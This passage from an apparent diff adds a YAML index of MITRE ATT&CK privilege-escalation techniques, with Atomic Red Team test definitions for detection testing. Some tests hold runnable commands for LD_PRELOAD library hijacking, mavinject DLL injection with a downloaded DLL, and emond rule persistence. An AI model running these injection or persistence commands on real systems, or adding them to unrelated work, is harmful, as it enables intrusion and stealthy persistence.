+ supported_platforms: + - linux + input_arguments: + path_to_shared_library_source: + description: Path to a shared library source code + type: Path + default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c + path_to_shared_library: + description: Path to a shared library object + type: Path + default: "/tmp/T1574006.so" + dependency_executor_name: bash + dependencies: + - description: 'The shared library must exist on disk at specified location + (#{path_to_shared_library}) + +' + prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} + +' + executor: + command: 'LD_PRELOAD=#{path_to_shared_library} ls + +' + name: bash + T1055.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1055.001 + url: https://attack.mitre.org/techniques/T1055/001 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + - url: https://www.endgame.com/blog/technical-blog/hunting-memory + description: Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December + 7, 2017. + source_name: Elastic HuntingNMemory June 2017 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Dynamic-link Library Injection + description: "Adversaries may inject dynamic-link libraries (DLLs) into processes + in order to evade process-based defenses as well as possibly elevate privileges. + DLL injection is a method of executing arbitrary code in the address space + of a separate live process. 
\n\nDLL injection is commonly performed by writing + the path to a DLL in the virtual address space of the target process before + loading the DLL by invoking a new thread. The write can be performed with + native Windows API calls such as VirtualAllocEx and WriteProcessMemory, + then invoked with CreateRemoteThread (which calls the LoadLibrary + API responsible for loading the DLL). (Citation: Elastic Process Injection + July 2017) \n\nVariations of this method such as reflective DLL injection + (writing a self-mapping DLL into a process) and memory module (map DLL when + writing into process) overcome the address relocation issue as well as the + additional APIs to invoke execution (since these methods load and execute + the files in memory by manually preforming the function of LoadLibrary).(Citation: + Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July + 2017) \n\nRunning code in the context of another process may allow access + to the process's memory, system/network resources, and possibly elevated privileges. + Execution via DLL injection may also evade detection from security products + since the execution is masked under a legitimate process. 
" + id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-11-10T18:29:30.879Z' + created: '2020-01-14T01:26:08.145Z' + x_mitre_defense_bypassed: + - Application control + - Anti-virus + x_mitre_data_sources: + - 'Module: Module Load' + - 'Process: OS API Execution' + - 'Process: Process Access' + x_mitre_permissions_required: + - User + x_mitre_detection: "Monitoring Windows API calls indicative of the various types + of code injection may generate a significant amount of data and may not be + directly useful for defense unless collected under specific circumstances + for known bad sequences of calls, since benign use of API functions may be + common and difficult to distinguish from malicious behavior. Windows API calls + such as CreateRemoteThread and those that can be used to modify + memory within another process, such as VirtualAllocEx/WriteProcessMemory, + may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nMonitor + DLL/PE file events, specifically creation of these binary files as well as + the loading of DLLs into processes. Look for DLLs that are not recognized + or not normally loaded into a process. \n\nAnalyze process behavior to determine + if a process is performing actions it usually does not, such as opening network + connections, reading files, or other suspicious actions that could relate + to post-compromise behavior. " + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + identifier: T1055.001 + atomic_tests: + - name: Process Injection via mavinject.exe + auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254 + description: | + Windows 10 Utility To Inject DLLS. + + Upon successful execution, powershell.exe will download T1055.dll to disk. 
Powershell will then spawn mavinject.exe to perform process injection in T1055.dll. + With default arguments, expect to see a MessageBox, with notepad's icon in taskbar. + supported_platforms: + - windows + input_arguments: + process_id: + description: PID of input_arguments + type: Integer + default: "(Start-Process notepad -PassThru).id" + dll_payload: + description: DLL to Inject + type: Path + default: PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll + dependency_executor_name: powershell + dependencies: + - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) + +' + prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" + executor: + command: | + $mypid = #{process_id} + mavinject $mypid /INJECTRUNNING #{dll_payload} + name: powershell + elevation_required: true + T1548.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1548.004 + url: https://attack.mitre.org/techniques/T1548/004 + - source_name: AppleDocs AuthorizationExecuteWithPrivileges + url: https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg + description: Apple. (n.d.). Apple Developer Documentation - AuthorizationExecuteWithPrivileges. + Retrieved August 8, 2019. + - source_name: Death by 1000 installers; it's all broken! + url: https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8 + description: Patrick Wardle. (2017). Death by 1000 installers; it's all broken!. + Retrieved August 8, 2019. 
+ - source_name: Carbon Black Shlayer Feb 2019 + url: https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/ + description: Carbon Black Threat Analysis Unit. (2019, February 12). New macOS + Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019. + - source_name: OSX Coldroot RAT + url: https://objective-see.com/blog/blog_0x2A.html + description: Patrick Wardle. (2018, February 17). Tearing Apart the Undetected + (OSX)Coldroot RAT. Retrieved August 8, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Elevated Execution with Prompt + description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges + API to escalate privileges by prompting the user for credentials.(Citation: + AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to + give application developers an easy way to perform operations with root privileges, + such as for application installation or updating. This API does not validate + that the program requesting root privileges comes from a reputable source + or has been maliciously modified. \n\nAlthough this API is deprecated, it + still fully functions in the latest releases of macOS. When calling this API, + the user will be prompted to enter their credentials but no checks on the + origin or integrity of the program are made. 
The program calling the API may + also load world writable files which can be modified to perform malicious + behavior with elevated privileges.\n\nAdversaries may abuse AuthorizationExecuteWithPrivileges + to obtain root privileges in order to install malicious software on victims + and install persistence mechanisms.(Citation: Death by 1000 installers; it's + all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot + RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) + to trick the user into granting escalated privileges to malicious code.(Citation: + Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer + Feb 2019) This technique has also been shown to work by modifying legitimate + programs present on the machine that make use of this API.(Citation: Death + by 1000 installers; it's all broken!)" + id: attack-pattern--b84903f0-c7d5-435d-a69e-de47cc3578c0 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-03-27T12:04:37.823Z' + created: '2020-01-30T14:40:20.187Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_effective_permissions: + - root + x_mitre_permissions_required: + - Administrator + - User + x_mitre_detection: Consider monitoring for /usr/libexec/security_authtrampoline + executions which may indicate that AuthorizationExecuteWithPrivileges + is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges + is being called. Monitoring OS API callbacks for the execution can also be + a way to detect this behavior but requires specialized security tooling. 
+ x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Process: Process Creation' + x_mitre_contributors: + - Jimmy Astle, @AstleJimmy, Carbon Black + - Erika Noerenberg, @gutterchurl, Carbon Black + x_mitre_platforms: + - macOS + atomic_tests: [] + T1546.014: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.014 + url: https://attack.mitre.org/techniques/T1546/014 + - source_name: xorrior emond Jan 2018 + url: https://www.xorrior.com/emond-persistence/ + description: Ross, Chris. (2018, January 17). Leveraging Emond on macOS For + Persistence. Retrieved September 10, 2019. + - source_name: magnusviri emond Apr 2016 + url: http://www.magnusviri.com/Mac/what-is-emond.html + description: Reynolds, James. (2016, April 7). What is emond?. Retrieved September + 10, 2019. + - source_name: sentinelone macos persist Jun 2019 + url: https://www.sentinelone.com/blog/how-malware-persists-on-macos/ + description: Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. + Retrieved September 10, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Emond + description: |- + Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place. + + The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. 
The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) + + Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service. + id: attack-pattern--9c45eaa3-8604-4780-8988-b5074dbb9ecd + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-24T21:37:25.307Z' + created: '2020-01-24T15:15:13.426Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: Monitor emond rules creation by checking for files created + or modified in /etc/emond.d/rules/ and /private/var/db/emondClients. 
+ x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'File: File Creation' + x_mitre_contributors: + - Ivan Sinyakov + x_mitre_platforms: + - macOS + identifier: T1546.014 + atomic_tests: + - name: Persistance with Event Monitor - emond + auto_generated_guid: 23c9c127-322b-4c75-95ca-eff464906114 + description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) + daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 + +' + supported_platforms: + - macos + input_arguments: + plist: + description: Path to attacker emond plist file + type: path + default: PathToAtomicsFolder/T1546.014/src/T1546.014_emond.plist + executor: + command: | + sudo cp "#{plist}" /etc/emond.d/rules/T1546.014_emond.plist + sudo touch /private/var/db/emondClients/T1546.014 + cleanup_command: | + sudo rm /etc/emond.d/rules/T1546.014_emond.plist + sudo rm /private/var/db/emondClients/T1546.014 + name: sh + elevation_required: true + T1611: + technique: + external_references: + - source_name: mitre-attack + external_id: T1611 + url: https://attack.mitre.org/techniques/T1611 + - source_name: Docker Overview + url: https://docs.docker.com/get-started/overview/ + description: Docker. (n.d.). Docker Overview. Retrieved March 30, 2021. + - source_name: Docker Bind Mounts + url: https://docs.docker.com/storage/bind-mounts/ + description: Docker. (n.d.). Use Bind Mounts. Retrieved March 30, 2021. + - source_name: Trend Micro Privileged Container + url: https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html + description: Fiser, D., Oliveira, A.. (2019, December 20). Why a Privileged + Container in Docker is a Bad Idea. Retrieved March 30, 2021. 
+ - source_name: Intezer Doki July 20 + url: https://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/ + description: 'Fishbein, N., Kajiloti, M.. (2020, July 28). Watch Your Containers: + Doki Infecting Docker Servers in the Cloud. Retrieved March 30, 2021.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Escape to Host + description: |- + Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview) + + There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host, and utilizing a privileged container to run commands on the underlying host.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20) Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host. 
+ id: attack-pattern--4a5b7ade-8bb5-4853-84ed-23f262002665 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-22T16:14:59.756Z' + created: '2021-03-30T17:38:34.277Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_permissions_required: + - Administrator + - User + - root + x_mitre_detection: Monitor for the deployment of suspicious or unknown container + images and pods in your environment, particularly containers running as root. + Additionally, monitor for unexpected usage of syscalls such as mount + (as well as resulting process activity) that may indicate an attempt to escape + from a privileged container to host. In Kubernetes, monitor for cluster-level + events associated with changing containers' volume configurations. + x_mitre_contributors: + - Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics + - Alfredo Oliveira, Trend Micro + - David Fiser, @anu4is, Trend Micro + - Idan Frimark, Cisco + - Magno Logan, @magnologan, Trend Micro + - Ariel Shuper, Cisco + - Yossi Weizman, Azure Defender Research Team + - Vishwas Manral, McAfee + x_mitre_platforms: + - Windows + - Linux + - Containers + x_mitre_data_sources: + - 'Container: Container Creation' + - 'Process: OS API Execution' + - 'Process: Process Creation' + atomic_tests: [] + T1546: + technique: + id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db + description: "Adversaries may establish persistence and/or elevate privileges + using system mechanisms that trigger execution based on specific events. Various + operating systems have means to monitor and subscribe to events such as logons + or other user activity such as running specific applications/binaries. \n\nAdversaries + may abuse these mechanisms as a means of maintaining persistent access to + a victim via repeatedly executing malicious code. 
After gaining access to + a victim system, adversaries may create/modify event triggers to point to + malicious content that will be executed whenever the event trigger is invoked.(Citation: + FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia + malware)\n\nSince the execution can be proxied by an account with higher permissions, + such as SYSTEM or service accounts, an adversary may be able to abuse these + triggered execution mechanisms to escalate their privileges. " + name: Event Triggered Execution + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1546 + url: https://attack.mitre.org/techniques/T1546 + - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf + description: Ballenthin, W., et al. (2015). Windows Management Instrumentation + (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016. + source_name: FireEye WMI 2015 + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. + Retrieved July 10, 2017. + source_name: Malware Persistence on OS X + - url: https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/ + description: Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux + Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018. 
+ source_name: amnesia malware + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-13T21:32:54.610Z' + created: '2020-01-22T21:04:23.285Z' + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'File: File Creation' + - 'File: File Modification' + - 'WMI: WMI Creation' + - 'File: File Metadata' + - 'Module: Module Load' + x_mitre_detection: "Monitoring for additions or modifications of mechanisms + that could be used to trigger event-based execution, especially the addition + of abnormal commands such as execution of unknown programs, opening network + sockets, or reaching out across the network. Also look for changes that do + not line up with updates, patches, or other planned administrative activity. + \n\nThese mechanisms may vary by OS, but are typically stored in central repositories + that store configuration information such as the Windows Registry, Common + Information Model (CIM), and/or specific named files, the last of which can + be hashed and compared to known good values. \n\nMonitor for processes, API/System + calls, and other common ways of manipulating these event repositories. \n\nTools + such as Sysinternals Autoruns can be used to detect changes to execution triggers + that could be attempts at persistence. Also look for abnormal process call + trees for execution of other commands that could relate to Discovery actions + or other techniques. \n\nMonitor DLL loads by processes, specifically looking + for DLLs that are not recognized or not normally loaded into a process. Look + for abnormal process behavior that may be due to a process loading a malicious + DLL. 
Data and events should not be viewed in isolation, but as part of a chain + of behavior that could lead to other activities, such as making network connections + for Command and Control, learning details about the environment through Discovery, + and conducting Lateral Movement. " + x_mitre_is_subtechnique: false + x_mitre_version: '1.1' + atomic_tests: [] + T1574.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1574.005 + url: https://attack.mitre.org/techniques/T1574/005 + - source_name: mozilla_sec_adv_2012 + url: https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/ + description: Robert Kugler. (2012, November 20). Mozilla Foundation Security + Advisory 2012-98. Retrieved March 10, 2017. + - source_name: Executable Installers are Vulnerable + url: https://seclists.org/fulldisclosure/2015/Dec/34 + description: 'Stefan Kanthak. (2015, December 8). Executable installers are + vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation + of privilege. Retrieved December 4, 2014.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Executable Installer File Permissions Weakness + description: |- + Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. 
+ + Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001). + + Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. 
+ id: attack-pattern--70d81154-b187-45f9-8ec5-295d01255979 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-03-26T19:20:23.030Z' + created: '2020-03-13T11:12:18.558Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - User + x_mitre_effective_permissions: + - Administrator + - User + - SYSTEM + x_mitre_detection: |- + Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data. + + Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + - 'Process: Process Creation' + - 'Service: Service Metadata' + x_mitre_contributors: + - Travis Smith, Tripwire + - Stefan Kanthak + x_mitre_platforms: + - Windows + atomic_tests: [] + T1068: + technique: + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1068 + url: https://attack.mitre.org/techniques/T1068 + - source_name: ESET InvisiMole June 2020 + url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf + description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE + HIDDEN PART OF THE STORY. Retrieved July 16, 2020.' 
+ - source_name: Unit42 AcidBox June 2020 + url: https://unit42.paloaltonetworks.com/acidbox-rare-malware/ + description: 'Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare + Malware Repurposing Turla Group Exploit Targeted Russian Organizations. + Retrieved March 16, 2021.' + - source_name: Microsoft Driver Block Rules + url: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules + description: Microsoft. (2020, October 15). Microsoft recommended driver block + rules. Retrieved March 16, 2021. + description: |- + Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions. + + When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. 
This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods. + + Adversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) or [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570). + name: Exploitation for Privilege Escalation + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-22T16:13:34.896Z' + created: '2017-05-31T21:30:55.066Z' + x_mitre_contributors: + - Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics + - Yaniv Agman, @AgmanYaniv, Team Nautilus Aqua Security + - Idan Revivo, @idanr86, Team Nautilus Aqua Security + x_mitre_version: '1.3' + x_mitre_data_sources: + - 'Driver: Driver Load' + x_mitre_detection: |- + Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery. 
Consider monitoring for the presence or loading (ex: Sysmon Event ID 6) of known vulnerable drivers that adversaries may drop and exploit to execute code in kernel mode.(Citation: Microsoft Driver Block Rules) + + Higher privileges are often necessary to perform additional actions such as some methods of [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Look for additional activity that may indicate an adversary has gained higher privileges. + x_mitre_effective_permissions: + - User + x_mitre_permissions_required: + - User + x_mitre_platforms: + - Linux + - macOS + - Windows + - Containers + x_mitre_is_subtechnique: false + atomic_tests: [] + T1055.011: + technique: + external_references: + - source_name: mitre-attack + external_id: T1055.011 + url: https://attack.mitre.org/techniques/T1055/011 + - url: https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx + description: Microsoft. (n.d.). About Window Classes. Retrieved December 16, + 2017. + source_name: Microsoft Window Classes + - url: https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx + description: Microsoft. (n.d.). GetWindowLong function. Retrieved December + 16, 2017. + source_name: Microsoft GetWindowLong function + - url: https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx + description: Microsoft. (n.d.). SetWindowLong function. Retrieved December + 16, 2017. + source_name: Microsoft SetWindowLong function + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + - url: https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html + description: MalwareTech. (2013, August 13). PowerLoader Injection – Something + truly amazing. 
Retrieved December 16, 2017. + source_name: MalwareTech Power Loader Aug 2013 + - url: https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/ + description: Matrosov, A. (2013, March 19). Gapz and Redyms droppers based + on Power Loader code. Retrieved December 16, 2017. + source_name: WeLiveSecurity Gapz and Redyms Mar 2013 + - url: https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx + description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December + 16, 2017. + source_name: Microsoft SendNotifyMessage function + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Extra Window Memory Injection + description: "Adversaries may inject malicious code into process via Extra Window + Memory (EWM) in order to evade process-based defenses as well as possibly + elevate privileges. EWM injection is a method of executing arbitrary code + in the address space of a separate live process. \n\nBefore creating a window, + graphical Windows-based processes must prescribe to or register a windows + class, which stipulate appearance and behavior (via windows procedures, which + are functions that handle input/output of data).(Citation: Microsoft Window + Classes) Registration of new windows classes can include a request for up + to 40 bytes of EWM to be appended to the allocated memory of each instance + of that class. This EWM is intended to store data specific to that window + and has specific application programming interface (API) functions to set + and get its value. (Citation: Microsoft GetWindowLong function) (Citation: + Microsoft SetWindowLong function)\n\nAlthough small, the EWM is large enough + to store a 32-bit pointer and is often used to point to a windows procedure. 
+ Malware may possibly utilize this memory location in part of an attack chain + that includes writing code to shared sections of the process’s memory, placing + a pointer to the code in EWM, then invoking execution by returning execution + control to the address in the process’s EWM.\n\nExecution granted through + EWM injection may allow access to both the target process's memory and possibly + elevated privileges. Writing payloads to shared sections also avoids the use + of highly monitored API calls such as WriteProcessMemory and + CreateRemoteThread.(Citation: Elastic Process Injection July + 2017) More sophisticated malware samples may also potentially bypass protection + mechanisms such as data execution prevention (DEP) by triggering a combination + of windows procedures and other system functions that will rewrite the malicious + payload inside an executable portion of the target process. (Citation: MalwareTech + Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)\n\nRunning + code in the context of another process may allow access to the process's memory, + system/network resources, and possibly elevated privileges. Execution via + EWM injection may also evade detection from security products since the execution + is masked under a legitimate process. " + id: attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-11-10T18:29:31.004Z' + created: '2020-01-14T17:18:32.126Z' + x_mitre_defense_bypassed: + - Anti-virus + - Application control + x_mitre_detection: 'Monitor for API calls related to enumerating and manipulating + EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and + SetWindowLong (Citation: Microsoft SetWindowLong function). 
Malware associated + with this technique have also used SendNotifyMessage (Citation: Microsoft + SendNotifyMessage function) to trigger the associated window procedure and + eventual malicious injection. (Citation: Elastic Process Injection July 2017)' + x_mitre_data_sources: + - 'Process: OS API Execution' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + atomic_tests: [] + T1484.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1484.001 + url: https://attack.mitre.org/techniques/T1484/001 + - source_name: TechNet Group Policy Basics + url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/ + description: 'srachui. (2012, February 13). Group Policy Basics – Part 1: + Understanding the Structure of a Group Policy Object. Retrieved March 5, + 2019.' + - source_name: ADSecurity GPO Persistence 2016 + url: https://adsecurity.org/?p=2716 + description: 'Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence + #17: Group Policy. Retrieved March 5, 2019.' + - source_name: Wald0 Guide to GPOs + url: https://wald0.com/?p=179 + description: Robbins, A. (2018, April 2). A Red Teamer’s Guide to GPOs and + OUs. Retrieved March 5, 2019. + - source_name: Harmj0y Abusing GPO Permissions + url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/ + description: Schroeder, W. (2016, 